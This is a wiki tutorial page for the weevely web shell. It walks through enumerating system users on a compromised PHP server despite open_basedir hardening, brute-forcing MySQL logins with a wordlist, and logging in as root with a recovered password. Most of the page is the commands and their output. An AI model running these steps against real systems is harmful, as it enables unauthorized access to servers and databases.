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Bruteforce SQL credentials

epinna edited this page Sep 20, 2014 · 1 revision

This example shows how to bruteforce credentials of multiple SQL users.


  • Example PHP configuration: disable_functions = system, proc_open, popen, passthru, shell_exec, exec, python_eval, perl_system and open_basedir = /var/www/html/
  • Used modules: audit_etcpasswd, bruteforce_sql, and sql_console


Gather as more as system usernames we can. Even if the open_basedir hardening does not allow any access outside the web folder and we can't execute system commands, we can still enumerate the system users using module audit_etcpasswd.

$ ./ http://target/agent.php mypassword

[+] weevely 3.0

[+] Target:	target
[+] Session:	_weevely/sessions/target/agent_1.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

www-data@target:/var/www/html PHP> cd ..
[-][cd] Failed cd '..': no such directory or permission denied
www-data@target:/var/www/html PHP> cat /etc/passwd
[-][download] File download failed, please check remote path and permissions
www-data@target:/var/www/html PHP> :audit_etcpasswd -real
www-data@target:/var/www/html PHP>

We got 5 usernames which we can try to bruteforce to find the SQL password. Launch the SQL bruteforce module using as password wordlist the local file wordlists/huge.txt.

www-data@target:/var/www/html PHP> :bruteforce_sql

error: too few arguments
usage: bruteforce_sql [-h] [-hostname HOSTNAME] [-users [USERS [USERS ...]]]
                      [-pwds [PWDS [PWDS ...]]] [-fusers FUSERS]
                      [-fpwds FPWDS]

Bruteforce SQL database

positional arguments:
  {mysql,pgsql}         Service to bruteforce

optional arguments:
  -h, --help            show this help message and exit
  -hostname HOSTNAME    Hostname
  -users [USERS [USERS ...]]
  -pwds [PWDS [PWDS ...]]
  -fusers FUSERS        Local file path containing users list
  -fpwds FPWDS          Local file path containing password list

www-data@target:/var/www/html PHP> :bruteforce_sql mysql -users roblast micjanost pjgomes pdpeers root -fpwds wordlists/huge.txt 
www-data@target:/var/www/html PHP>

In few seconds we got 3 out of 5 credentials. Use sql_console to check the found accounts.

www-data@target:/var/www/html PHP> :sql_console -u root -p Gilchrist
root@localhost SQL> show databases;
| mysql              |
| performance_schema |
| test               |
| appdb              |
root@localhost SQL> 
